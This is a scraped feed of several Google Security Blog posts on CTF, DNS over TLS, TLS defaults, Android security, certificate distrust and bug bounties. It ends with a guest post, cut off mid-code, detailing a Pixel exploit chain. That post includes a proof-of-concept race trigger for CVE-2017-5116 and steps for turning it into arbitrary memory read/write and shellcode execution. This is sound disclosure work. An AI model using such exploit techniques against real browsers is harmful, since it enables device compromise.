Loading...
Google Online Security Blog by Google Security Pr - 1w ago
Posted by Jan Keller, Security TPM
Google CTF 2017 was a big success! We had over 5,000 players, nearly 2,000 teams captured flags, we paid $31,1337.00, and most importantly: you had fun playing and we had fun hosting!

Congratulations (for the second year) to the team pasten, from Israel, for scoring first place in both the quals and the finals. Also, for everyone who hasn’t played yet or wants to play again, we have open-sourced the 2017 challenges in our GitHub repository.


Hence, we are excited to announce Google CTF 2018:

  • Date and time: 00:00:01 UTC on June 23th and 24th, 2018
  • Location: Online
  • Prizes: Big checks, swag and rewards for creative write-ups
The winning teams will compete again for a spot at the Google CTF Finals later this year (more details on the Finals soon).


For beginners and veterans alike

Based on the feedback we received, we plan to have additional challenges this year where people that may be new to CTFs or security can learn about, and try their hands at, some security challenges. These will be presented in a “Quest” style where there will be a scenario similar to a real world penetration testing environment. We hope that this will give people a chance to sharpen their skills, learn something new about CTFs and security, while allowing them to see a real world value to information security and its broader impact.

We hope to virtually see you at the 3rd annual Google CTF on June 23rd 2018 at 00:00:01 UTC. Check g.co/ctf, or subscribe to our mailing list for more details, as they become available.
Why do we host these competitions?

We outlined our philosophy last year, but in short: we believe that the security community helps us better protect Google users, and so we want to nurture the community and give back in a fun way.

Thirsty for more?

There are a lot of opportunities for you to help us make the Internet a safer place:
Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
Posted by Elie Bursztein, Anti-Abuse Research Lead - Ian Goodfellow, Adversarial Machine Learning Research Lead

Recent advances in AI are transforming how we combat fraud and abuse and implement new security protections. These advances are critical to meeting our users’ expectations and keeping increasingly sophisticated attackers at bay, but they come with brand new challenges as well.

This week at RSA, we explored the intersection between AI, anti-abuse, and security in two talks.

Our first talk provided a concise overview of how we apply AI to fraud and abuse problems. The talk started by detailing the fundamental reasons why AI is key to building defenses that keep up with user expectations and combat increasingly sophisticated attacks. It then delved into the top 10 anti-abuse specific challenges encountered while applying AI to abuse fighting and how to overcome them. Check out the infographic at the end of the post for a quick overview of the challenges we covered during the talk.

Our second talk looked at attacks on ML models themselves and the ongoing effort to develop new defenses.

It covered attackers’ attempts to recover private training data, to introduce examples into the training set of a machine learning model to cause it to learn incorrect behaviors, to modify the input that a machine learning model receives at classification time to cause it to make a mistake, and more.

Our talk also looked at various defense solutions, including differential privacy, which provides a rigorous theoretical framework for preventing attackers from recovering private training data.

Hopefully you were to able to join us at RSA! But if not, here is re-recording and the slides of our first talk on applying AI to abuse-prevention, along with the slides from our second talk about protecting ML models.

Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
Posted by Erik Kline, Android software engineer, and Ben Schwartz, Jigsaw software engineer

[Cross-posted from the Android Developers Blog]

The first step of almost every connection on the internet is a DNS query. A client, such as a smartphone, typically uses a DNS server provided by the Wi-Fi or cellular network. The client asks this DNS server to convert a domain name, like www.google.com, into an IP address, like 2607:f8b0:4006:80e::2004. Once the client has the IP address, it can connect to its intended destination.

When the DNS protocol was designed in the 1980s, the internet was a much smaller, simpler place. For the past few years, the Internet Engineering Task Force (IETF) has worked to define a new DNS protocol that provides users with the latest protections for security and privacy. The protocol is called "DNS over TLS" (standardized as RFC 7858).

Like HTTPS, DNS over TLS uses the TLS protocol to establish a secure channel to the server. Once the secure channel is established, DNS queries and responses can't be read or modified by anyone else who might be monitoring the connection. (The secure channel only applies to DNS, so it can't protect users from other kinds of security and privacy violations.)

DNS over TLS in P

The Android P Developer Preview includes built-in support for DNS over TLS. We added a Private DNS mode to the Network & internet settings.
By default, devices automatically upgrade to DNS over TLS if a network's DNS server supports it. But users who don't want to use DNS over TLS can turn it off.

Users can enter a hostname if they want to use a private DNS provider. Android then sends all DNS queries over a secure channel to this server or marks the network as "No internet access" if it can't reach the server. (For testing purposes, see this community-maintained list of compatible servers.)

DNS over TLS mode automatically secures the DNS queries from all apps on the system. However, apps that perform their own DNS queries, instead of using the system's APIs, must ensure that they do not send insecure DNS queries when the system has a secure connection. Apps can get this information using a new API: LinkProperties.isPrivateDnsActive()

With the Android P Developer Preview, we're proud to present built-in support for DNS over TLS. In the future, we hope that all operating systems will include secure transports for DNS, to provide better protection and privacy for all users on every new connection.
Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
Posted by Chad Brubaker, Senior Software Engineer Android Security
[Cross-posted from the Android Developers Blog]

Android is committed to keeping users, their devices, and their data safe. One of the ways that we keep data safe is by protecting all data that enters or leaves an Android device with Transport Layer Security (TLS) in transit. As we announced in our Android P developer preview, we're further improving these protections by preventing apps that target Android P from allowing unencrypted connections by default.

This follows a variety of changes we've made over the years to better protect Android users. To prevent accidental unencrypted connections, we introduced the android:usesCleartextTraffic manifest attribute in Android Marshmallow. In Android Nougat, we extended that attribute by creating the Network Security Config feature, which allows apps to indicate that they do not intend to send network traffic without encryption. In Android Nougat and Oreo, we still allowed cleartext connections.

How do I update my app?

If your app uses TLS for all connections then you have nothing to do. If not, update your app to use TLS to encrypt all connections. If you still need to make cleartext connections, keep reading for some best practices.

Why should I use TLS?

Android considers all networks potentially hostile and so encrypting traffic should be used at all times, for all connections. Mobile devices are especially at risk because they regularly connect to many different networks, such as the Wi-Fi at a coffee shop.

All traffic should be encrypted, regardless of content, as any unencrypted connections can be used to inject content, increase attack surface for potentially vulnerable client code, or track the user. For more information, see our past blog post and Developer Summit talk.

Isn't TLS slow?

No, it's not.

How do I use TLS in my app?

Once your server supports TLS, simply change the URLs in your app and server responses from http:// to https://. Your HTTP stack handles the TLS handshake without any more work.

If you are making sockets yourself, use an SSLSocketFactory instead of a SocketFactory. Take extra care to use the socket correctly as SSLSocket doesn't perform hostname verification. Your app needs to do its own hostname verification, preferably by calling getDefaultHostnameVerifier() with the expected hostname. Further, beware that HostnameVerifier.verify() doesn't throw an exception on error but instead returns a boolean result that you must explicitly check.

I need to use cleartext traffic to

While you should use TLS for all connections, it's possibly that you need to use cleartext traffic for legacy reasons, such as connecting to some servers. To do this, change your app's network security config to allow those connections.

We've included a couple example configurations. See the network security config documentation for a bit more help.

Allow cleartext connections to a specific domain

If you need to allow connections to a specific domain or set of domains, you can use the following config as a guide:
<network-security-config>
<domain-config cleartextTrafficPermitted="true">
<domain includeSubdomains="true">insecure.example.com</domain>
<domain includeSubdomains="true">insecure.cdn.example.com</domain>
</domain-config>
</network-security-config>
Allow connections to arbitrary insecure domains

If your app supports opening arbitrary content from URLs over insecure connections, you should disable cleartext connections to your own services while supporting cleartext connections to arbitrary hosts. Keep in mind that you should be cautious about the data received over insecure connections as it could have been tampered with in transit.

<network-security-config>
<domain-config cleartextTrafficPermitted="false">
<domain includeSubdomains="true">example.com</domain>
<domain includeSubdomains="true">cdn.example2.com</domain>
</domain-config>
<base-config cleartextTrafficPermitted="true" />
</network-security-config>

How do I update my library?

If your library directly creates secure/insecure connections, make sure that it honors the app's cleartext settings by checking isCleartextTrafficPermitted before opening any cleartext connection.
Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
Posted by Dave Kleidermacher, Vice President of Security for Android, Play, ChromeOS

Our team’s goal is simple: secure more than two billion Android devices. It’s our entire focus, and we’re constantly working to improve our protections to keep users safe.
Today, we’re releasing our fourth annual Android Security Year in Review. We compile these reports to help educate the public about the many different layers of Android security, and also to hold ourselves accountable so that anyone can track our security work over time.
We saw really positive momentum last year and this post includes some, but not nearly all, of the major moments from 2017. To dive into all the details, you can read the full report at: g.co/AndroidSecurityReport2017

Google Play Protect

In May, we announced Google Play Protect, a new home for the suite of Android security services on nearly two billion devices. While many of Play Protect’s features had been securing Android devices for years, we wanted to make these more visible to help assure people that our security protections are constantly working to keep them safe.

Play Protect’s core objective is to shield users from Potentially Harmful Apps, or PHAs. Every day, it automatically reviews more than 50 billion apps, other potential sources of PHAs, and devices themselves and takes action when it finds any.

Play Protect uses a variety of different tactics to keep users and their data safe, but the impact of machine learning is already quite significant: 60.3% of all Potentially Harmful Apps were detected via machine learning, and we expect this to increase in the future.
Protecting users' devices
Play Protect automatically checks Android devices for PHAs at least once every day, and users can conduct an additional review at any time for some extra peace of mind. These automatic reviews enabled us to remove nearly 39 million PHAs last year.

We also update Play Protect to respond to trends that we detect across the ecosystem. For instance, we recognized that nearly 35% of new PHA installations were occurring when a device was offline or had lost network connectivity. As a result, in October 2017, we enabled offline scanning in Play Protect, and have since prevented 10 million more PHA installs.


Preventing PHA downloads
Devices that downloaded apps exclusively from Google Play were nine times less likely to get a PHA than devices that downloaded apps from other sources. And these security protections continue to improve, partially because of Play Protect’s increased visibility into newly submitted apps to Play. It reviewed 65% more Play apps compared to 2016.

Play Protect also doesn’t just secure Google Play—it helps protect the broader Android ecosystem as well. Thanks in large part to Play Protect, the installation rates of PHAs from outside of Google Play dropped by more than 60%.



Security updates


While Google Play Protect is a great shield against harmful PHAs, we also partner with device manufacturers to make sure that the version of Android running on users' devices is up-to-date and secure.

Throughout the year, we worked to improve the process for releasing security updates, and 30% more devices received security patches than in 2016. Furthermore, no critical security vulnerabilities affecting the Android platform were publicly disclosed without an update or mitigation available for Android devices. This was possible due to the Android Security Rewards Program, enhanced collaboration with the security researcher community, coordination with industry partners, and built-in security features of the Android platform.


New security features in Android Oreo


We introduced a slew of new security features in Android Oreo: making it safer to get apps, dropping insecure network protocols, providing more user control over identifiers, hardening the kernel, and more.

We highlighted many of these over the course of the year, but some may have flown under the radar. For example, we updated the overlay API so that apps can no longer block the entire screen and prevent you from dismissing them, a common tactic employed by ransomware.


Openness makes Android security stronger


We’ve long said it, but it remains truer than ever: Android’s openness helps strengthen our security protections. For years, the Android ecosystem has benefitted from researchers’ findings, and 2017 was no different.

Security reward programs
We continued to see great momentum with our Android Security Rewards program: we paid researchers $1.28 million dollars, pushing our total rewards past $2 million dollars since the program began. We also increased our top-line payouts for exploits that compromise TrustZone or Verified Boot from $50,000 to $200,000, and remote kernel exploits from $30,000 to $150,000.

In parallel, we introduced Google Play Security Rewards Program and offered a bonus bounty to developers that discover and disclose select critical vulnerabilities in apps hosted on Play to their developers.

External security competitions
Our teams also participated in external vulnerability discovery and disclosure competitions, such as Mobile Pwn2Own. At the 2017 Mobile Pwn2Own competition, no exploits successfully compromised the Google Pixel. And of the exploits demonstrated against devices running Android, none could be reproduced on a device running unmodified Android source code from the Android Open Source Project (AOSP).



We’re pleased to see the positive momentum behind Android security, and we’ll continue our work to improve our protections this year, and beyond. We will never stop our work to ensure the security of Android users.
Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
Posted by Devon O’Brien, Ryan Sleevi, Emily Stark, Chrome security team

We previously announced plans to deprecate Chrome’s trust in the Symantec certificate authority (including Symantec-owned brands like Thawte, VeriSign, Equifax, GeoTrust, and RapidSSL). This post outlines how site operators can determine if they’re affected by this deprecation, and if so, what needs to be done and by when. Failure to replace these certificates will result in site breakage in upcoming versions of major browsers, including Chrome.

Chrome 66

If your site is using a SSL/TLS certificate from Symantec that was issued before June 1, 2016, it will stop functioning in Chrome 66, which could already be impacting your users.
If you are uncertain about whether your site is using such a certificate, you can preview these changes in Chrome Canary to see if your site is affected. If connecting to your site displays a certificate error or a warning in DevTools as shown below, you’ll need to replace your certificate. You can get a new certificate from any trusted CA, including Digicert, which recently acquired Symantec’s CA business.
An example of a certificate error that Chrome 66 users might see if you are using a Legacy Symantec SSL/TLS certificate that was issued before June 1, 2016. 
The DevTools message you will see if you need to replace your certificate before Chrome 66.

Chrome 66 has already been released to the Canary and Dev channels, meaning affected sites are already impacting users of these Chrome channels. If affected sites do not replace their certificates by March 15, 2018, Chrome Beta users will begin experiencing the failures as well. You are strongly encouraged to replace your certificate as soon as possible if your site is currently showing an error in Chrome Canary.

Chrome 70

Starting in Chrome 70, all remaining Symantec SSL/TLS certificates will stop working, resulting in a certificate error like the one shown above. To check if your certificate will be affected, visit your site in Chrome today and open up DevTools. You’ll see a message in the console telling you if you need to replace your certificate.
The DevTools message you will see if you need to replace your certificate before Chrome 70.
If you see this message in DevTools, you’ll want to replace your certificate as soon as possible. If the certificates are not replaced, users will begin seeing certificate errors on your site as early as July 20, 2018. The first Chrome 70 Beta release will be around September 13, 2018.

Expected Chrome Release Timeline

The table below shows the First Canary, First Beta and Stable Release for Chrome 66 and 70. The first impact from a given release will coincide with the First Canary, reaching a steadily widening audience as the release hits Beta and then ultimately Stable. Site operators are strongly encouraged to make the necessary changes to their sites before the First Canary release for Chrome 66 and 70, and no later than the corresponding Beta release dates.
Release
First Canary
First Beta
Stable Release
Chrome 66
January 20, 2018
~ March 15, 2018
~ April 17, 2018
Chrome 70
~ July 20, 2018
~ September 13, 2018
~ October 16, 2018

For information about the release timeline for a particular version of Chrome, you can also refer to the Chromium Development Calendar which will be updated should release schedules change.

In order to address the needs of certain enterprise users, Chrome will also implement an Enterprise Policy that allows disabling the Legacy Symantec PKI distrust starting with Chrome 66. As of January 1, 2019, this policy will no longer be available and the Legacy Symantec PKI will be distrusted for all users.


Special Mention: Chrome 65

As noted in the previous announcement, SSL/TLS certificates from the Legacy Symantec PKI issued after December 1, 2017 are no longer trusted. This should not affect most site operators, as it requires entering in to special agreement with DigiCert to obtain such certificates. Accessing a site serving such a certificate will fail and the request will be blocked as of Chrome 65. To avoid such errors, ensure that such certificates are only served to legacy devices and not to browsers such as Chrome.
Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
Posted by Emily Schechter, Chrome Security Product Manager Team
For the past several years, we’ve moved toward a more secure web by strongly advocating that sites adopt HTTPS encryption. And within the last year, we’ve also helped users understand that HTTP sites are not secure by gradually marking a larger subset of HTTP pages as “not secure”. Beginning in July 2018 with the release of Chrome 68, Chrome will mark all HTTP sites as “not secure”.

In Chrome 68, the omnibox will display “Not secure” for all HTTP pages.


Developers have been transitioning their sites to HTTPS and making the web safer for everyone. Progress last year was incredible, and it’s continued since then:

  • Over 68% of Chrome traffic on both Android and Windows is now protected
  • Over 78% of Chrome traffic on both Chrome OS and Mac is now protected
  • 81 of the top 100 sites on the web use HTTPS by default
Chrome is dedicated to making it as easy as possible to set up HTTPS. Mixed content audits are now available to help developers migrate their sites to HTTPS in the latest Node CLI version of Lighthouse, an automated tool for improving web pages. The new audit in Lighthouse helps developers find which resources a site loads using HTTP, and which of those are ready to be upgraded to HTTPS simply by changing the subresource reference to the HTTPS version.

Lighthouse is an automated developer tool for improving web pages.

Chrome’s new interface will help users understand that all HTTP sites are not secure, and continue to move the web towards a secure HTTPS web by default. HTTPS is easier and cheaper than ever before, and it unlocks both performance improvements and powerful new features that are too sensitive for HTTP. Developers, check out our set-up guides to get started.
Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
Posted by Jan Keller, Google VRP Technical Pwning Master
As we kick-off a new year, we wanted to take a moment to look back at the Vulnerability Reward Program in 2017. It joins our past retrospectives for 2014, 2015, and 2016, and shows the course our VRPs have taken.

At the heart of this blog post is a big thank you to the security research community. You continue to help make Google’s users and our products more secure. We looking forward to continuing our collaboration with the community in 2018 and beyond!

2017, By the Numbers

Here’s an overview of how we rewarded researchers for their reports to us in 2017:
We awarded researchers more than 1 million dollars for vulnerabilities they found and reported in Google products, and a similar amount for Android as well. Combined with our Chrome awards, we awarded nearly 3 million dollars to researchers for their reports last year, overall.

Drilling-down a bit further, we awarded $125,000 to more than 50 security researchers from all around the world through our Vulnerability Research Grants Program, and $50,000 to the hard-working folks who improve the security of open-source software as part of our Patch Rewards Program.

A few bug highlights

Every year, a few bug reports stand out: the research may have been especially clever, the vulnerability may have been especially serious, or the report may have been especially fun and quirky!

Here are a few of our favorites from 2017:

  • In August, researcher Guang Gong outlined an exploit chain on Pixel phones which combined a remote code execution bug in the sandboxed Chrome render process with a subsequent sandbox escape through Android’s libgralloc. As part of the Android Security Rewards Program he received the largest reward of the year: $112,500. The Pixel was the only device that wasn’t exploited during last year’s annual Mobile pwn2own competition, and Guang’s report helped strengthen its protections even further.
  • Researcher "gzobqq" received the $100,000 pwnium award for a chain of bugs across five components that achieved remote code execution in Chrome OS guest mode.
  • Alex Birsan discovered that anyone could have gained access to internal Google Issue Tracker data. He detailed his research here, and we awarded him $15,600 for his efforts.

Making Android and Play even safer

Over the course of the year, we continued to develop our Android and Play Security Reward programs.

No one had claimed the top reward for an Android exploit chain in more than two years, so we announced that the greatest reward for a remote exploit chain--or exploit leading to TrustZone or Verified Boot compromise--would increase from $50,000 to $200,000. We also increased the top-end reward for a remote kernel exploit from $30,000 to $150,000.


In October, we introduced the by-invitation-only Google Play Security Reward Program to encourage security research into popular Android apps available on Google Play.


Today, we’re expanding the range of rewards for remote code executions from $1,000 to $5,000. We’re also introducing a new category that includes vulnerabilities that could result in the theft of users’ private data, information being transferred unencrypted, or bugs that result in access to protected app components. We’ll award $1,000 for these bugs. For more information visit the Google Play Security Reward Program site.


And finally, we want to give a shout out to the researchers who’ve submitted fuzzers to the Chrome Fuzzer Program: they get rewards for every eligible bug their fuzzers find without having to do any more work, or even filing a bug.


Given how well things have been going these past years, we look forward to our Vulnerability Rewards Programs resulting in even more user protection in 2018 thanks to the hard work of the security research community.

* Andrew Whalley (Chrome VRP), Mayank Jain (Android Security Rewards), and Renu Chaudhary (Google Play VRP) contributed mightily to help lead these Google-wide efforts.
Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Posted by Alex Wozniak, Software Engineer, Safe Browsing Team
In May 2016, we introduced the latest version of the Google Safe Browsing API (v4). Since this launch, thousands of developers around the world have adopted the API to protect over 3 billion devices from unsafe web resources.

Coupled with that announcement was the deprecation of legacy Safe Browsing APIs, v2 and v3. Today we are announcing an official turn-down date of October 1st, 2018, for these APIs. All v2 and v3 clients must transition to the v4 API prior to this date.

To make the switch easier, an open source implementation of the Update API (v4) is available on GitHub. Android developers always get the latest version of Safe Browsing’s data and protocols via the SafetyNet Safe Browsing API. Getting started is simple; all you need is a Google Account, Google Developer Console project, and an API key.

For questions or feedback, join the discussion with other developers on the Safe Browsing Google Group. Visit our website for the latest information on Safe Browsing.
Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
Posted by the Android security team

[Cross-posted from the Android Developers Blog]

In June 2017, the Android security team increased the top payouts for the Android Security Rewards (ASR) program and worked with researchers to streamline the exploit submission process. In August 2017, Guang Gong (@oldfresher) of Alpha Team, Qihoo 360 Technology Co. Ltd. submitted the first working remote exploit chain since the ASR program's expansion. For his detailed report, Gong was awarded $105,000, which is the highest reward in the history of the ASR program and $7500 by Chrome Rewards program for a total of %112,500. The complete set of issues was resolved as part of the December 2017 monthly security update. Devices with the security patch level of 2017-12-05 or later are protected from these issues.
All Pixel devices or partner devices using A/B (seamless) system updates will automatically install these updates; users must restart their devices to complete the installation.
The Android Security team would like to thank Guang Gong and the researcher community for their contributions to Android security. If you'd like to participate in Android Security Rewards program, check out our Program rules. For tips on how to submit reports, see Bug Hunter University.
The following article is a guest blog post authored by Guang Gong of Alpha team, Qihoo 360 Technology Ltd.
Technical details of a Pixel remote exploit chainThe Pixel phone is protected by many layers of security. It was the only device that was not pwned in the 2017 Mobile Pwn2Own competition. But in August 2017, my team discovered a remote exploit chain—the first of its kind since the ASR program expansion. Thanks to the Android security team for their responsiveness and help during the submission process.
This blog post covers the technical details of the exploit chain. The exploit chain includes two bugs, CVE-2017-5116 and CVE-2017-14904. CVE-2017-5116 is a V8 engine bug that is used to get remote code execution in sandboxed Chrome render process. CVE-2017-14904 is a bug in Android's libgralloc module that is used to escape from Chrome's sandbox. Together, this exploit chain can be used to inject arbitrary code into system_server by accessing a malicious URL in Chrome. To reproduce the exploit, an example vulnerable environment is Chrome 60.3112.107 + Android 7.1.2 (Security patch level 2017-8-05) (google/sailfish/sailfish:7.1.2/NJH47F/4146041:user/release-keys).
The RCE bug (CVE-2017-5116)New features usually bring new bugs. V8 6.0 introduces support for SharedArrayBuffer, a low-level mechanism to share memory between JavaScript workers and synchronize control flow across workers. SharedArrayBuffers give JavaScript access to shared memory, atomics, and futexes. WebAssembly is a new type of code that can be run in modern web browsers— it is a low-level assembly-like language with a compact binary format that runs with near-native performance and provides languages, such as C/C++, with a compilation target so that they can run on the web. By combining the three features, SharedArrayBuffer WebAssembly, and web worker in Chrome, an OOB access can be triggered through a race condition. Simply speaking, WebAssembly code can be put into a SharedArrayBuffer and then transferred to a web worker. When the main thread parses the WebAssembly code, the worker thread can modify the code at the same time, which causes an OOB access.
The buggy code is in the function GetFirstArgumentAsBytes where the argument args may be an ArrayBuffer or TypedArray object. After SharedArrayBuffer is imported to JavaScript, a TypedArray may be backed by a SharedArraybuffer, so the content of the TypedArray may be modified by other worker threads at any time.
i::wasm::ModuleWireBytes GetFirstArgumentAsBytes(
const v8::FunctionCallbackInfo<v8::Value>& args, ErrorThrower* thrower) {
......
} else if (source->IsTypedArray()) { //--->source should be checked if it's backed by a SharedArrayBuffer
// A TypedArray was passed.
Local<TypedArray> array = Local<TypedArray>::Cast(source);
Local<ArrayBuffer> buffer = array->Buffer();
ArrayBuffer::Contents contents = buffer->GetContents();
start =
reinterpret_cast<const byte*>(contents.Data()) + array->ByteOffset();
length = array->ByteLength();
}
......
return i::wasm::ModuleWireBytes(start, start + length);
}
A simple PoC is as follows:
<html>
<h1>poc</h1>
<script id="worker1">
worker:{
self.onmessage = function(arg) {
console.log("worker started");
var ta = new Uint8Array(arg.data);
var i =0;
while(1){
if(i==0){
i=1;
ta[51]=0; //--->4)modify the webassembly code at the same time
}else{
i=0;
ta[51]=128;
}
}
}
}
</script>
<script>
function getSharedTypedArray(){
var wasmarr = [
0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,
0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f, 0x03,
0x03, 0x02, 0x00, 0x00, 0x07, 0x12, 0x01, 0x0e,
0x67, 0x65, 0x74, 0x41, 0x6e, 0x73, 0x77, 0x65,
0x72, 0x50, 0x6c, 0x75, 0x73, 0x31, 0x00, 0x01,
0x0a, 0x0e, 0x02, 0x04, 0x00, 0x41, 0x2a, 0x0b,
0x07, 0x00, 0x10, 0x00, 0x41, 0x01, 0x6a, 0x0b];
var sb = new SharedArrayBuffer(wasmarr.length); //---> 1)put WebAssembly code in a SharedArrayBuffer
var sta = new Uint8Array(sb);
for(var i=0;i<sta.length;i++)
sta[i]=wasmarr[i];
return sta;
}
var blob = new Blob([
document.querySelector('#worker1').textContent
], { type: "text/javascript" })
var worker = new Worker(window.URL.createObjectURL(blob)); //---> 2)create a web worker
var sta = getSharedTypedArray();
worker.postMessage(sta.buffer); //--->3)pass the WebAssembly code to the web worker
setTimeout(function(){
while(1){
try{
sta[51]=0;
var myModule = new WebAssembly.Module(sta); //--->4)parse the WebAssembly code
var myInstance = new WebAssembly.Instance(myModule);
//myInstance.exports.getAnswerPlus1();
}catch(e){
}
}
},1000);
//worker.terminate();
</script>
</html>
The text format of the WebAssembly code is as follows:
00002b func[0]:
00002d: 41 2a | i32.const 42
00002f: 0b | end
000030 func[1]:
000032: 10 00 | call 0
000034: 41 01 | i32.const 1
000036: 6a | i32.add
000037: 0b | end
First, the above binary format WebAssembly code is put into a SharedArrayBuffer, then a TypedArray Object is created, using the SharedArrayBuffer as buffer. After that, a worker thread is created and the SharedArrayBuffer is passed to the newly created worker thread. While the main thread is parsing the WebAssembly Code, the worker thread modifies the SharedArrayBuffer at the same time. Under this circumstance, a race condition causes a TOCTOU issue. After the main thread's bound check, the instruction " call 0" can be modified by the worker thread to "call 128" and then be parsed and compiled by the main thread, so an OOB access occurs.
Because the "call 0" Web Assembly instruction can be modified to call any other Web Assembly functions, the exploitation of this bug is straightforward. If "call 0" is modified to "call $leak", registers and stack contents are dumped to Web Assembly memory. Because function 0 and function $leak have a different number of arguments, this results in many useful pieces of data in the stack being leaked.
 (func $leak(param i32 i32 i32 i32 i32 i32)(result i32)
i32.const 0
get_local 0
i32.store
i32.const 4
get_local 1
i32.store
i32.const 8
get_local 2
i32.store
i32.const 12
get_local 3
i32.store
i32.const 16
get_local 4
i32.store
i32.const 20
get_local 5
i32.store
i32.const 0
))
Not only the instruction "call 0" can be modified, any "call funcx" instruction can be modified. Assume funcx is a wasm function with 6 arguments as follows, when v8 compiles funcx in ia32 architecture, the first 5 arguments are passed through the registers and the sixth argument is passed through stack. All the arguments can be set to any value by JavaScript:
/*Text format of funcx*/
(func $simple6 (param i32 i32 i32 i32 i32 i32 ) (result i32)
get_local 5
get_local 4
i32.add)
/*Disassembly code of funcx*/
--- Code ---
kind = WASM_FUNCTION
name = wasm#1
compiler = turbofan
Instructions (size = 20)
0x58f87600 0 8b442404 mov eax,[esp+0x4]
0x58f87604 4 03c6 add eax,esi
0x58f87606 6 c20400 ret 0x4
0x58f87609 9 0f1f00 nop
Safepoints (size = 8)
RelocInfo (size = 0)
--- End code ---
When a JavaScript function calls a WebAssembly function, v8 compiler creates a JS_TO_WASM function internally, after compilation, the JavaScript function will call the created JS_TO_WASM function and then the created JS_TO_WASM function will call the WebAssembly function. JS_TO_WASM functions use different call convention, its first arguments is passed through stack. If "call funcx" is modified to call the following JS_TO_WASM function.
/*Disassembly code of JS_TO_WASM function */
--- Code ---
kind = JS_TO_WASM_FUNCTION
name = js-to-wasm#0
compiler = turbofan
Instructions (size = 170)
0x4be08f20 0 55 push ebp
0x4be08f21 1 89e5 mov ebp,esp
0x4be08f23 3 56 push esi
0x4be08f24 4 57 push edi
0x4be08f25 5 83ec08 sub esp,0x8
0x4be08f28 8 8b4508 mov eax,[ebp+0x8]
0x4be08f2b b e8702e2bde call 0x2a0bbda0 (ToNumber) ;; code: BUILTIN
0x4be08f30 10 a801 test al,0x1
0x4be08f32 12 0f852a000000 jnz 0x4be08f62 <+0x42>
The JS_TO_WASM function will take the sixth arguments of funcx as its first argument, but it takes its first argument as an object pointer, so type confusion will be triggered when the argument is passed to the ToNumber function, which means we can pass any values as an object pointer to the ToNumber function. So we can fake an ArrayBuffer object in some address such as in a double array and pass the address to ToNumber. The layout of an ArrayBuffer is as follows:
/* ArrayBuffer layouts 40 Bytes*/                                                                                                                         
Map
Properties
Elements
ByteLength
BackingStore
AllocationBase
AllocationLength
Fields
internal
internal
/* Map layouts 44 Bytes*/
static kMapOffset = 0,
static kInstanceSizesOffset = 4,
static kInstanceAttributesOffset = 8,
static kBitField3Offset = 12,
static kPrototypeOffset = 16,
static kConstructorOrBackPointerOffset = 20,
static kTransitionsOrPrototypeInfoOffset = 24,
static kDescriptorsOffset = 28,
static kLayoutDescriptorOffset = 1,
static kCodeCacheOffset = 32,
static kDependentCodeOffset = 36,
static kWeakCellCacheOffset = 40,
static kPointerFieldsBeginOffset = 16,
static kPointerFieldsEndOffset = 44,
static kInstanceSizeOffset = 4,
static kInObjectPropertiesOrConstructorFunctionIndexOffset = 5,
static kUnusedOffset = 6,
static kVisitorIdOffset = 7,
static kInstanceTypeOffset = 8, //one byte
static kBitFieldOffset = 9,
static kInstanceTypeAndBitFieldOffset = 8,
static kBitField2Offset = 10,
static kUnusedPropertyFieldsOffset = 11
Because the content of the stack can be leaked, we can get many useful data to fake the ArrayBuffer. For example, we can leak the start address of an object, and calculate the start address of its elements, which is a FixedArray object. We can use this FixedArray object as the faked ArrayBuffer's properties and elements fields. We have to fake the map of the ArrayBuffer too, luckily, most of the fields of the map are not used when the bug is triggered. But the InstanceType in offset 8 has to be set to 0xc3(this value depends on the version of v8) to indicate this object is an ArrayBuffer. In order to get a reference of the faked ArrayBuffer in JavaScript, we have to set the Prototype field of Map in offset 16 to an object whose Symbol.toPrimitive property is a JavaScript call back function. When the faked array buffer is passed to the ToNumber function, to convert the ArrayBuffer object to a Number, the call back function will be called, so we can get a reference of the faked ArrayBuffer in the call back function. Because the ArrayBuffer is faked in a double array, the content of the array can be set to any value, so we can change the field BackingStore and ByteLength of the faked array buffer to get arbitrary memory read and write. With arbitrary memory read/write, executing shellcode is simple. As JIT Code in Chrome is readable, writable and executable, we can overwrite it to execute shellcode.
Chrome team fixed this bug very quickly in chrome 61.0.3163.79, just a week after I submitted the exploit.
The EoP Bug (CVE-2017-14904)The sandbox escape bug is caused by map and unmap mismatch, which causes a Use-After-Unmap issue. The buggy code is in the functions gralloc_map and gralloc_unmap:
static int gralloc_map(gralloc_module_t const* module,
buffer_handle_t handle)
{ ……
private_handle_t* hnd = (private_handle_t*)handle;
……
if (!(hnd->flags & private_handle_t::PRIV_FLAGS_FRAMEBUFFER) &&
!(hnd->flags & private_handle_t::PRIV_FLAGS_SECURE_BUFFER)) {
size = hnd->size;
err = memalloc->map_buffer(&mappedAddress, size,
hnd->offset, hnd->fd); //---> mapped an ashmem and get the mapped address. the ashmem fd and offset can be controlled by Chrome render process.
if(err || mappedAddress == MAP_FAILED) {
ALOGE("Could not mmap handle %p, fd=%d (%s)",
handle, hnd->fd, strerror(errno));
return -errno;
}
hnd->base = uint64_t(mappedAddress) + hnd->offset; //---> save mappedAddress+offset to hnd->base
} else {
err = -EACCES;
}
……
return err;
}
gralloc_map maps a graphic buffer controlled by the arguments handle to memory space and gralloc_unmap unmaps it. While mapping, the mappedAddress plus hnd->offset is stored to hnd->base, but while unmapping, hnd->base is passed to system call unmap directly minus the offset. hnd->offset can be manipulated from a Chrome's sandboxed process, so it's possible to unmap any pages in system_server from Chrome's sandboxed render process.
static int gralloc_unmap(gralloc_module_t const* module,
buffer_handle_t handle)
{
……
if(hnd->base) {
